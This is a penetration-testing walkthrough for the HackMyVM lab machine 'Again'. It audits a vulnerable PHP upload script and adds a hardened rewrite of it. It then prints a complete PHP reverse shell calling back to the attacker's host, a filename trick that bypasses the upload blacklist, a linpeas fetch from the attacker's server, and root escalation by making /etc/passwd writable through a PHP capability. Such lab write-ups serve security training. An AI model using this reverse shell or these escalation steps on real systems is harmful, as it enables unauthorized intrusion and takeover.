Target machine information
Download:
- https://hackmyvm.eu/machines/machine.php?vm=Again
Netdisk mirror: https://pan.baidu.com/s/1MYO7cEOg2xou1FrC40v6qg?pwd=ja7r
Platform: HackMyVm.eu
Machine name: Again
Difficulty: Hard
Release date: 11 October 2021
Hints:
- None
Goal: user.txt and root.txt
Lab environment
- Attacker: VMware Kali, 10.0.0.3, eth0 bridged to the internet, eth1 bridged to the VirtualBox host-only network
- Target: VirtualBox Linux, IP obtained automatically, host-only adapter
Information gathering
Host discovery
Scan the LAN for the target's IP address:
- sudo netdiscover -r 10.0.0.0/24 -i eth1
The host is found at 10.0.0.117
Port scan
Scan the target for open service ports:
- sudo nmap -sC -sV -p- 10.0.0.139 -oN nmap.log
Ports 22 and 80 are open; start with port 80
Web exploitation
The site only offers an upload feature. The page source contains the hint "Kerszi, delete the .bck file", so run a directory scan looking for .bck files:
- gobuster dir -w ../../Dict/SecLists-2022.1/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.0.0.139 -x bck
upload.bck is found; download it:
- wget http://10.0.0.139/upload.bck
Check what kind of file upload.bck is:
- file upload.bck
It is a PHP script; view its contents
PHP code audit
```php
<?php
if (!isset($_FILES["myFile"])) {
    die("There is no file to upload."); // check that a file was uploaded
}
$filepath = $_FILES['myFile']['tmp_name']; // temporary file path
$fileSize = filesize($filepath); // file size
$fileinfo = finfo_open(FILEINFO_MIME_TYPE); // determine the file type by MIME sniffing
$filetype = finfo_file($fileinfo, $filepath);
if ($fileSize === 0) {
    die("The file is empty."); // reject empty files
}
$allowedTypes = [
    'image/jpeg' => 'jpg',
    'text/plain' => 'txt'
]; // allowed file types
if (!in_array($filetype, array_keys($allowedTypes))) {
    echo $filetype;
    die("File not allowed."); // stop if the sniffed type is not in $allowedTypes
}
$filename = basename($filepath);
$extension = $allowedTypes[$filetype];
$newFilepath = $_FILES['myFile']['name']; // client-supplied file name, used as-is
if (!copy($filepath, $newFilepath)) {
    die("Can't move file."); // copy the temp file into the current (web) directory
}
$blacklistchars = '"%\'*|$;^`{}~\#=&';
if (preg_match('/[' . $blacklistchars . ']/', $newFilepath)) {
    echo ("No valid character detected"); // if the file name contains any of "%'*|$;^`{}~\#=& exit here; the file was already copied above and is never removed
    exit();
}
if ($filetype === "image/jpeg"){ // the upload is an image
    echo $newFilepath;
    $myfile = fopen("outputimage.php", "w") or die("Unable to open file!"); // open a writable file
    $command = "base64 ".$newFilepath;
    $output = shell_exec($command); // base64-encode the file by running a shell command that contains the file name
    unlink($newFilepath); // delete the uploaded file
    echo "File uploaded";
    $lol = '<img src="data:image/png;base64,'.$output.'" alt="Happy" />';
    fwrite($myfile, $lol);
}
else{ // not jpeg, so it must be text
    $myfile2 = fopen("outputtext.txt", "w") or die("Unable to open file!"); // open a writable file
    $command = "cat ".$newFilepath; // build a cat command that contains the file name
    $output = shell_exec($command); // run $command
    unlink($newFilepath); // delete the uploaded file
    echo "File uploaded";
    fwrite($myfile2, $output); // write the command output to outputtext.txt
}
?>
```
From the source: the webshell has to be disguised so its sniffed MIME type is text/plain, its file name has to contain one of the blacklisted characters "%'*|$;^`{}~\#=& so that the script exits at the blacklist check before it reaches unlink(), and the file therefore has to survive on disk. Let's verify.
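For comparison, here is a hardened rewrite of the same handler, added as an example and not the machine's own upload.bck. It validates before anything is written, stores the file under a server-generated name in a directory outside the web root (/var/uploads is an assumed path), and reads the file back with PHP's file API instead of shell_exec.

```php
<?php
// Hardened rewrite of upload.bck (added example, not the machine's code).
// UPLOAD_DIR is an assumed directory outside the web root, never served by the web server.
const UPLOAD_DIR = '/var/uploads';
const ALLOWED_TYPES = ['image/jpeg' => 'jpg', 'text/plain' => 'txt'];

// Validate first, write to disk last: nothing is copied until every check has passed,
// so a rejected upload can never be left behind the way copy()-then-exit() did.
function handle_upload(array $file): array {
    if (!isset($file['tmp_name']) || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('There is no file to upload.');
    }
    if (filesize($file['tmp_name']) === 0) {
        throw new RuntimeException('The file is empty.');
    }
    $finfo = finfo_open(FILEINFO_MIME_TYPE);
    $type = finfo_file($finfo, $file['tmp_name']);
    finfo_close($finfo);
    if (!array_key_exists($type, ALLOWED_TYPES)) {
        throw new RuntimeException('File not allowed.');
    }
    // finfo can still be fooled (a .php with text prepended sniffs as text/plain), so the
    // stored extension and location, not the sniffed type, are what keep the file inert.
    // Server-generated name: the client-supplied name never touches the filesystem or a
    // shell, so there is no character blacklist to bypass.
    $stored = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$type];
    if (!move_uploaded_file($file['tmp_name'], $stored)) {
        throw new RuntimeException("Can't move file.");
    }
    return [$stored, $type];
}

// Read the file back with PHP's file API; the original's shell_exec("cat $name") and
// shell_exec("base64 $name") placed the file name on a shell command line.
function render_upload(string $stored, string $type): string {
    $data = file_get_contents($stored);
    if ($type === 'image/jpeg') {
        return '<img src="data:image/jpeg;base64,' . base64_encode($data) . '" alt="upload" />';
    }
    // Escape text so an uploaded .txt cannot inject HTML into the page either.
    return '<pre>' . htmlspecialchars($data, ENT_QUOTES, 'UTF-8') . '</pre>';
}

try {
    [$stored, $type] = handle_upload($_FILES['myFile'] ?? []);
    echo render_upload($stored, $type);
} catch (RuntimeException $e) {
    http_response_code(400);
    echo htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8');
}
```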
1. Prepare a reverse shell
shell.php
```php
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.0.0.3';  // CHANGE THIS
$port = 4444;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/bash -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
    // Fork and have the parent process exit
    $pid = pcntl_fork();
    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }
    if ($pid) {
        exit(0); // Parent exits
    }
    // Make the current process a session leader
    // Will only succeed if we forked
    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }
    $daemon = 1;
} else {
    printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}
// Spawn shell process
$descriptorspec = array(
    0 => array("pipe", "r"), // stdin is a pipe that the child will read from
    1 => array("pipe", "w"), // stdout is a pipe that the child will write to
    2 => array("pipe", "w")  // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}
// Set everything to non-blocking
// Reason: Occasionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
    // Check for end of TCP connection
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }
    // Check for end of STDOUT
    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }
    // Wait until a command is sent down $sock, or some
    // command output is available on STDOUT or STDERR
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
    // If we can read from the TCP socket, send
    // data to process's STDIN
    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }
    // If we can read from the process's STDOUT
    // send data down tcp connection
    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }
    // If we can read from the process's STDERR
    // send data down tcp connection
    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
    if (!$daemon) {
        print "$string\n";
    }
}
?>
```
2. Change the file name and MIME type (the semicolon must be quoted so the shell does not treat it as a command separator)
- cp shell.php ';shell.php'
3. Edit ;shell.php and add the string "RANDOM TEXT TO MAKE THE SCRIPT THINK IT IS A TEXT FILE" at the very top, so finfo sniffs it as text/plain.
- vi ';shell.php'
4. Listen on port 4444 on the attacker machine
- rlwrap nc -lvvp 4444
5. Upload and request the shell
The upload responds with "No valid character detected"; ignore it and request the shell anyway:
- http://10.0.0.139/;shell.php
The reverse shell connects; look for sensitive information:
- cd /var/www/html
- ls
- cat id_rsa.bck
A backup of id_rsa is found; download it:
- wget http://10.0.0.139/id_rsa.bck
Keep looking for sensitive information:
- cat /etc/passwd
One user with a login shell is found; try logging in over SSH with the key:
- chmod 600 id_rsa.bck
The key requires a passphrase, so upload a helper script for further enumeration.
1. On the attacker, start an HTTP server in the directory holding the helper scripts
- python3 -m http.server
2. On the target, download linpeas.sh and run it
- cd /tmp
- wget http://10.0.0.3:8000/linpeas.sh
- chmod +x linpeas.sh
- ./linpeas.sh
/usr/bin/php7.4 has a file capability set; check how php can be used to escalate privileges:
- https://gtfobins.github.io/gtfobins/php/#capabilities
It can change the permissions of other files; verify:
- php7.4 -r 'chmod("/etc/passwd", 0666);'
With read/write access to passwd, generate a password hash and replace root's password in the passwd file.
1. Generate an MD5-crypt password hash
- openssl passwd -1 123123
2. Edit the passwd file
Once edited, switch to root:
- su
- id
Root obtained; find the flags:
- cat /home/kerszi/user.txt
- cat /root/r00t.txt
Got user.txt and r00t.txt; game over.
Originally published on the WeChat public account 伏波路上学安全: Penetration testing practice No.74 HackMyVm Again